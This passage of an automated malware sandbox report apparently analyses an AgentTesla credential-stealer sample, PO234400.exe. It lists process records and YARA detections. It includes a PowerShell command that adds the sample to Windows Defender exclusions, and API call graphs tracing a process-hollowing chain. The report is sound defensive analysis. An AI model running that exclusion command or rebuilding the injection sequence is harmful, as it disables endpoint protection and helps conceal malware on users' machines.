                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1379891077.00000000040EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:14:30:24
                                                  Start date:18/03/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe
                                                  Imagebase:0x3b0000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:14:30:24
                                                  Start date:18/03/2024
                                                  Path:C:\Users\user\Desktop\PO234400.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Desktop\PO234400.exe
                                                  Imagebase:0x130000
                                                  File size:634'368 bytes
                                                  MD5 hash:1ED78424905206C4549AC51B97B5120B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:14:30:24
                                                  Start date:18/03/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:14:30:24
                                                  Start date:18/03/2024
                                                  Path:C:\Users\user\Desktop\PO234400.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\PO234400.exe
                                                  Imagebase:0xe50000
                                                  File size:634'368 bytes
                                                  MD5 hash:1ED78424905206C4549AC51B97B5120B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2607967300.000000000322A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000002.2606062779.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2607967300.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2607967300.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:7
                                                  Start time:14:30:26
                                                  Start date:18/03/2024
                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                  Imagebase:0x7ff605670000
                                                  File size:496'640 bytes
                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                    Execution Graph

                                                    Execution Coverage:9.9%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:157
                                                    Total number of Limit Nodes:16
                                                    execution_graph 24566 12c4668 24567 12c467a 24566->24567 24568 12c4686 24567->24568 24570 12c4778 24567->24570 24571 12c479d 24570->24571 24575 12c4878 24571->24575 24579 12c4888 24571->24579 24577 12c48af 24575->24577 24576 12c498c 24576->24576 24577->24576 24583 12c44b0 24577->24583 24580 12c48af 24579->24580 24581 12c44b0 CreateActCtxA 24580->24581 24582 12c498c 24580->24582 24581->24582 24584 12c5918 CreateActCtxA 24583->24584 24586 12c59db 24584->24586 24586->24586 24589 12cd438 24590 12cd47e GetCurrentProcess 24589->24590 24592 12cd4c9 24590->24592 24593 12cd4d0 GetCurrentThread 24590->24593 24592->24593 24594 12cd50d GetCurrentProcess 24593->24594 24595 12cd506 24593->24595 24596 12cd543 24594->24596 24595->24594 24597 12cd56b GetCurrentThreadId 24596->24597 24598 12cd59c 24597->24598 24599 7b1ad88 24600 7b1af13 24599->24600 24602 7b1adae 24599->24602 24602->24600 24603 7b1a87c 24602->24603 24604 7b1b008 PostMessageW 24603->24604 24605 7b1b074 24604->24605 24605->24602 24587 12cd680 DuplicateHandle 24588 12cd716 24587->24588 24606 12cacb0 24607 12cacbf 24606->24607 24610 12cada8 24606->24610 24618 12cad98 24606->24618 24611 12cadb9 24610->24611 24613 12caddc 24610->24613 24611->24613 24626 12cb040 24611->24626 24630 12cb031 24611->24630 24612 12cadd4 24612->24613 24614 12cafe0 GetModuleHandleW 24612->24614 24613->24607 24615 12cb00d 24614->24615 24615->24607 24619 12cadb9 24618->24619 24620 12caddc 24618->24620 24619->24620 24624 12cb040 LoadLibraryExW 24619->24624 24625 12cb031 LoadLibraryExW 24619->24625 24620->24607 24621 12cadd4 24621->24620 24622 12cafe0 GetModuleHandleW 24621->24622 24623 12cb00d 24622->24623 24623->24607 24624->24621 24625->24621 24627 12cb054 24626->24627 24629 12cb079 24627->24629 24634 12ca168 24627->24634 24629->24612 24631 12cb054 24630->24631 24632 12cb079 24631->24632 24633 12ca168 LoadLibraryExW 24631->24633 24632->24612 24633->24632 24636 12cb220 LoadLibraryExW 24634->24636 
24637 12cb299 24636->24637 24637->24629 24638 7b196ce 24639 7b1965c 24638->24639 24641 7b196d1 24638->24641 24640 7b1968a 24639->24640 24655 7b19bb0 24639->24655 24660 7b1a028 24639->24660 24664 7b19ae9 24639->24664 24668 7b19c47 24639->24668 24672 7b1a1a4 24639->24672 24677 7b1a1de 24639->24677 24688 7b19cdf 24639->24688 24693 7b1a15d 24639->24693 24698 7b19fbb 24639->24698 24703 7b19c94 24639->24703 24708 7b19d94 24639->24708 24718 7b19bd5 24639->24718 24722 7b1a170 24639->24722 24656 7b19bb6 24655->24656 24727 7b17a10 24656->24727 24731 7b17a08 24656->24731 24657 7b19cc0 24657->24640 24735 7b17ac0 24660->24735 24739 7b17ab8 24660->24739 24661 7b1a042 24661->24640 24743 7b17ee0 24664->24743 24747 7b17ed4 24664->24747 24751 7b17c50 24668->24751 24755 7b17c58 24668->24755 24669 7b19c75 24669->24640 24673 7b1a1b6 24672->24673 24759 7b17b91 24673->24759 24763 7b17b98 24673->24763 24674 7b1a342 24678 7b1a1eb 24677->24678 24679 7b19d94 24677->24679 24680 7b1a06e 24679->24680 24681 7b19cab 24679->24681 24686 7b17ac0 Wow64SetThreadContext 24680->24686 24687 7b17ab8 Wow64SetThreadContext 24680->24687 24682 7b1a4ce 24681->24682 24684 7b17a10 ResumeThread 24681->24684 24685 7b17a08 ResumeThread 24681->24685 24683 7b19cc0 24683->24640 24684->24683 24685->24683 24686->24683 24687->24683 24689 7b19ce5 24688->24689 24691 7b17c50 WriteProcessMemory 24689->24691 24692 7b17c58 WriteProcessMemory 24689->24692 24690 7b19b41 24690->24640 24691->24690 24692->24690 24694 7b19cf6 24693->24694 24695 7b19b41 24693->24695 24696 7b17c50 WriteProcessMemory 24694->24696 24697 7b17c58 WriteProcessMemory 24694->24697 24695->24640 24696->24695 24697->24695 24699 7b19bce 24698->24699 24700 7b19cc0 24699->24700 24701 7b17a10 ResumeThread 24699->24701 24702 7b17a08 ResumeThread 24699->24702 24700->24640 24701->24700 24702->24700 24704 7b19c9a 24703->24704 24706 7b17a10 ResumeThread 24704->24706 24707 7b17a08 ResumeThread 24704->24707 24705 7b19cc0 24705->24640 24706->24705 24707->24705 24709 
7b19da9 24708->24709 24710 7b1a06e 24709->24710 24711 7b19cab 24709->24711 24716 7b17ac0 Wow64SetThreadContext 24710->24716 24717 7b17ab8 Wow64SetThreadContext 24710->24717 24712 7b1a4ce 24711->24712 24714 7b17a10 ResumeThread 24711->24714 24715 7b17a08 ResumeThread 24711->24715 24713 7b19cc0 24713->24640 24714->24713 24715->24713 24716->24713 24717->24713 24767 7b17d40 24718->24767 24771 7b17d48 24718->24771 24719 7b19b9f 24723 7b1a179 24722->24723 24724 7b19f1b 24723->24724 24725 7b17c50 WriteProcessMemory 24723->24725 24726 7b17c58 WriteProcessMemory 24723->24726 24725->24723 24726->24723 24728 7b17a50 ResumeThread 24727->24728 24730 7b17a81 24728->24730 24730->24657 24732 7b17a50 ResumeThread 24731->24732 24734 7b17a81 24732->24734 24734->24657 24736 7b17b05 Wow64SetThreadContext 24735->24736 24738 7b17b4d 24736->24738 24738->24661 24740 7b17b05 Wow64SetThreadContext 24739->24740 24742 7b17b4d 24740->24742 24742->24661 24744 7b17f69 CreateProcessA 24743->24744 24746 7b1812b 24744->24746 24748 7b17f69 CreateProcessA 24747->24748 24750 7b1812b 24748->24750 24752 7b17ca0 WriteProcessMemory 24751->24752 24754 7b17cf7 24752->24754 24754->24669 24756 7b17ca0 WriteProcessMemory 24755->24756 24758 7b17cf7 24756->24758 24758->24669 24760 7b17bd8 VirtualAllocEx 24759->24760 24762 7b17c15 24760->24762 24762->24674 24764 7b17bd8 VirtualAllocEx 24763->24764 24766 7b17c15 24764->24766 24766->24674 24768 7b17d93 ReadProcessMemory 24767->24768 24770 7b17dd7 24768->24770 24770->24719 24772 7b17d93 ReadProcessMemory 24771->24772 24774 7b17dd7 24772->24774 24774->24719
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1cf3f4c4a35f86db9c9bfe4194627eb891b60d8724c9884dbf182b13e75d9e72
                                                    • Instruction ID: c5a931156205807928aafcf8c22de2c59f32c2e3a38ba97637d795da74b24149
                                                    • Opcode Fuzzy Hash: 1cf3f4c4a35f86db9c9bfe4194627eb891b60d8724c9884dbf182b13e75d9e72
                                                    • Instruction Fuzzy Hash: 74E1BAF17016058FEB29DB75C454BAFB7F6EF89600F9484ADD1469B290DB34E802CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 50a4d47f6932a42d30ba301ecc33f19c384cca80655da3296a387ed764d74995
                                                    • Instruction ID: 7cf6e4ce8ba4ca70d58be5109b60e544d54c02bc3c1710a18002a2d4b6af9cf1
                                                    • Opcode Fuzzy Hash: 50a4d47f6932a42d30ba301ecc33f19c384cca80655da3296a387ed764d74995
                                                    • Instruction Fuzzy Hash: 77410BB1E10219CBEB04CFA9C9447DEFBB6BF89300F55C166D408B7254DB346985CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 012CD4B6
                                                    • GetCurrentThread.KERNEL32 ref: 012CD4F3
                                                    • GetCurrentProcess.KERNEL32 ref: 012CD530
                                                    • GetCurrentThreadId.KERNEL32 ref: 012CD589
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: ec52930c1a941fa5f618d59fd46ed07c3183b044c3e48e35f93fa1579bfb2198
                                                    • Instruction ID: 1572706b2501289fd19240a6d7f5042db9913c0debef62bf9ce1a5b7b25fa84d
                                                    • Opcode Fuzzy Hash: ec52930c1a941fa5f618d59fd46ed07c3183b044c3e48e35f93fa1579bfb2198
                                                    • Instruction Fuzzy Hash: E35166B09003498FEB14DFAAD548BEEBBF1BF88314F20856DD509A7290DB345945CB65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 012CD4B6
                                                    • GetCurrentThread.KERNEL32 ref: 012CD4F3
                                                    • GetCurrentProcess.KERNEL32 ref: 012CD530
                                                    • GetCurrentThreadId.KERNEL32 ref: 012CD589
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: ad76d14539d7c0206963b19ae2c7c6401dc401dd821838257816e2680fe9bda7
                                                    • Instruction ID: ee97bc3cc0a0c710f9a9f13a3e17cadf7bc6f0a5c4c68271377e6b53b9d794cf
                                                    • Opcode Fuzzy Hash: ad76d14539d7c0206963b19ae2c7c6401dc401dd821838257816e2680fe9bda7
                                                    • Instruction Fuzzy Hash: 3F5137B09003098FDB14DFAAD548BAEBBF1FF88314F20856DD519A7350DB346945CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph
                                                    
                                                    (rendered graph omitted) Function 7b17ed4, basic blocks 7b17ed4-7b18225; CreateProcessA is called from block 7b1806f-7b18129.
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07B18116
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: abfad5575574b858dd53d05099efed63677ce5bdb1a41317d63d4d77b6c66e1f
                                                    • Instruction ID: a4f3ab541974a40cfd892571cc0f7ebb206286b9c70d3156ef331ed98369a013
                                                    • Opcode Fuzzy Hash: abfad5575574b858dd53d05099efed63677ce5bdb1a41317d63d4d77b6c66e1f
                                                    • Instruction Fuzzy Hash: 62A14AB1D0065ACFEB24DF68C8417EEBBB2FF48320F5585A9D808A7240DB759985CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph
                                                    
                                                    (rendered graph omitted) Function 7b17ee0, basic blocks 7b17ee0-7b18225; CreateProcessA is called from block 7b1806f-7b18129.
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07B18116
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: a932189fc5c48a00af2604ce362b5275bb9f3586eb71ad10c1fa9c0793cdda98
                                                    • Instruction ID: 5359f6f06d230c2616516c5cc11d14647d500126dd21ff31aa947d14d082ab1b
                                                    • Opcode Fuzzy Hash: a932189fc5c48a00af2604ce362b5275bb9f3586eb71ad10c1fa9c0793cdda98
                                                    • Instruction Fuzzy Hash: EF916CB1D0065ACFEB14DF68C8417EEBBB2FF48320F5585A9D808A7240DB759985CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph
                                                    
                                                    (rendered graph omitted) Function 12cada8, basic blocks 12cada8-12cb028; internal calls to 12c93d4, 12cb040, 12cb031, 12ca110, 12ca120, 12ca130 and 12ca140; GetModuleHandleW is called from block 12cafe0-12cb00b.
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 012CAFFE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 0adb76fa8a99f50b0a314c82fe592c5216e64bff57b3c3a0219de377994921ae
                                                    • Instruction ID: bd769808322bc6665b22ef5174046c17241946c35947ac0ae43dfa1f5d3747ba
                                                    • Opcode Fuzzy Hash: 0adb76fa8a99f50b0a314c82fe592c5216e64bff57b3c3a0219de377994921ae
                                                    • Instruction Fuzzy Hash: DC816970A10B0A8FD724DF69D4417AABBF1BF88704F008A2DD246D7651E775E846CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph
                                                    
                                                    (rendered graph omitted) Function 12c44b0, basic blocks 12c44b0-12c5a61; CreateActCtxA is called from block 12c44b0-12c59d9.
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 012C59C9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: fd4b1ae37587d5c800844de868db9ea815de23eaf17b7b157310234c0cd46292
                                                    • Instruction ID: 1f2991f7b536576d8553034ddc98c7bbc44af923281c6b06404da226994beafb
                                                    • Opcode Fuzzy Hash: fd4b1ae37587d5c800844de868db9ea815de23eaf17b7b157310234c0cd46292
                                                    • Instruction Fuzzy Hash: 5141E2B0D00719CBEB24DFAAC8847DEBBB5BF89714F20815AD508AB251DB71A945CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph
                                                    
                                                    (rendered graph omitted) Function 12c590c, basic blocks 12c590c-12c5a61; CreateActCtxA is called from block 12c591c-12c59d9.
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 012C59C9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 37a4828a6ef41407544a043f123ad342dc861a2f59e0b58c6ff829ea00ad8fdc
                                                    • Instruction ID: 8d39ab8ef64e61a11c28ac656cb796f76b972f693af601ad5cb73612c5aea2de
                                                    • Opcode Fuzzy Hash: 37a4828a6ef41407544a043f123ad342dc861a2f59e0b58c6ff829ea00ad8fdc
                                                    • Instruction Fuzzy Hash: F64104B0D00719CFEB24DFAAC8847DEBBB5BF85714F20815AD508AB251DB71A946CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph
                                                    
                                                    (rendered graph omitted) Function 7b17c50, basic blocks 7b17c50-7b17d2e; WriteProcessMemory is called from block 7b17cb6-7b17cf5.
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07B17CE8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 06286c24c0844477f0632395b7280909624c82149a836d960eadcfb32d5159ee
                                                    • Instruction ID: ab5113abd68906b8d443ef44a822d385fb72961df8e568e239bcf3b17b1d5013
                                                    • Opcode Fuzzy Hash: 06286c24c0844477f0632395b7280909624c82149a836d960eadcfb32d5159ee
                                                    • Instruction Fuzzy Hash: 232128B69003199FDB10DFA9C9817EEBBF5FF48320F50842AE959A7240DB789954CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph
                                                    
                                                    (rendered graph omitted) Function 7b17c58, basic blocks 7b17c58-7b17d2e; WriteProcessMemory is called from block 7b17cb6-7b17cf5.
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07B17CE8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: ca8c49b4183f4138b68b3f7c2a5163ed7b6161adadb15d25cb52e71e29567bf6
                                                    • Instruction ID: 0510e133edd9bff0a286bed1bfdae1c6a9f6691fbbf4f4d9a7bab13768796079
                                                    • Opcode Fuzzy Hash: ca8c49b4183f4138b68b3f7c2a5163ed7b6161adadb15d25cb52e71e29567bf6
                                                    • Instruction Fuzzy Hash: B8212AB19003499FDB10DFA9C881BEEBBF5FF48320F50842AE918A7240DB789554CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph
                                                    
                                                    (rendered graph omitted) Function 7b17d40, basic blocks 7b17d40-7b17e0e; ReadProcessMemory is called from block 7b17d40-7b17dd5.
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07B17DC8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: bda1d6e4ce2841580a7ef94d3faccf9b1d9de465514c3f2a4bcf0bf800adebb3
                                                    • Instruction ID: 11025feb0a0de6befd0b99ef5edc1f3d8c572aa58660447450247fe3e2b4a5c3
                                                    • Opcode Fuzzy Hash: bda1d6e4ce2841580a7ef94d3faccf9b1d9de465514c3f2a4bcf0bf800adebb3
                                                    • Instruction Fuzzy Hash: DA2128B18003499FDF10DFA9C981BEEBBF5FF48320F50882AE518A7240CB399545CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph
                                                    
                                                    (rendered graph omitted) Function 7b17ab8, basic blocks 7b17ab8-7b17b84; Wow64SetThreadContext is called from block 7b17b1b-7b17b4b.
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B17B3E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: d0e3b4f6598d9ed45f6f6ffbf6e059604043d298d55c3230ef00250ab097fe14
                                                    • Instruction ID: a33a247883d86ccb4ee841856ede1f40bb273da3cb1bdf57798e16157f1d5380
                                                    • Opcode Fuzzy Hash: d0e3b4f6598d9ed45f6f6ffbf6e059604043d298d55c3230ef00250ab097fe14
                                                    • Instruction Fuzzy Hash: 562137B59003098FEB10DFAAC4817EFBBF4EF58220F54842AD559A7240CB789945CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph
                                                    
                                                    (rendered graph omitted) Function 12cd679, basic blocks 12cd679-12cd73a; DuplicateHandle is called from block 12cd679-12cd714.
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012CD707
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: e883985518c2ee891b6c476201a31357f72acf3051e051fc281844f450b5b380
                                                    • Instruction ID: 22e24aa80035174ed027f3905a129176a30551d351484d02bda774348bcb3a19
                                                    • Opcode Fuzzy Hash: e883985518c2ee891b6c476201a31357f72acf3051e051fc281844f450b5b380
                                                    • Instruction Fuzzy Hash: 5D21E6B5D002499FDB10CFAAD584AEEBFF5FB48320F14811AE954A3350D379A945CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph
                                                    
                                                    (rendered graph omitted) Function 7b17d48, basic blocks 7b17d48-7b17e0e; ReadProcessMemory is called from block 7b17d48-7b17dd5.
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07B17DC8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 391d7d37688f6937abbfff267b7d329196f123c1cea900a78e52285f036382d6
                                                    • Instruction ID: 27b2c42ea1aca187a4a916294a6715793252210dc530206ec38d87d0e92df1cd
                                                    • Opcode Fuzzy Hash: 391d7d37688f6937abbfff267b7d329196f123c1cea900a78e52285f036382d6
                                                    • Instruction Fuzzy Hash: F92128B180034D9FDB10DFAAC880BEEBBF5FF48320F50842AE518A7240CB789500CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Block 294 (7b17ac0-7b17b0b): branches to blocks 296 and 297
                                                    • Block 297 (7b17b0d-7b17b19): continues to block 296
                                                    • Block 296 (7b17b1b-7b17b4b): calls Wow64SetThreadContext; branches to blocks 299 and 300
                                                    • Block 300 (7b17b4d-7b17b53): continues to block 299
                                                    • Block 299 (7b17b54-7b17b84)
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B17B3E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1388192273.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7b10000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: 45fed51e722ba7cf9a7a4b5603f9939e6bb023d1966c6099a7a65b9d8fde4ee4
                                                    • Instruction ID: 9dfdfbbf864116a17d6a09c4a354a7400a9f3e2d1148dc02be47e653325851f5
                                                    • Opcode Fuzzy Hash: 45fed51e722ba7cf9a7a4b5603f9939e6bb023d1966c6099a7a65b9d8fde4ee4
                                                    • Instruction Fuzzy Hash: 142118B19003099FEB10DFAAC4857EEBBF4EF88224F54842AD559A7240CB789945CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Block 312 (12cd680-12cd714): calls DuplicateHandle; branches to blocks 313 and 314
                                                    • Block 314 (12cd716-12cd71c): continues to block 313
                                                    • Block 313 (12cd71d-12cd73a)
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012CD707
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1377190570.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_12c0000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 504b432b2a2e6ac62beb7c3d86a79f870b723b25963cc9a46ffffaa46bab0240
                                                    • Instruction ID: 39d53ba8335d206b127698a550e26faf58a4838f1ec544812a529e654f7f4766
                                                    • Opcode Fuzzy Hash: 504b432b2a2e6ac62beb7c3d86a79f870b723b25963cc9a46ffffaa46bab0240
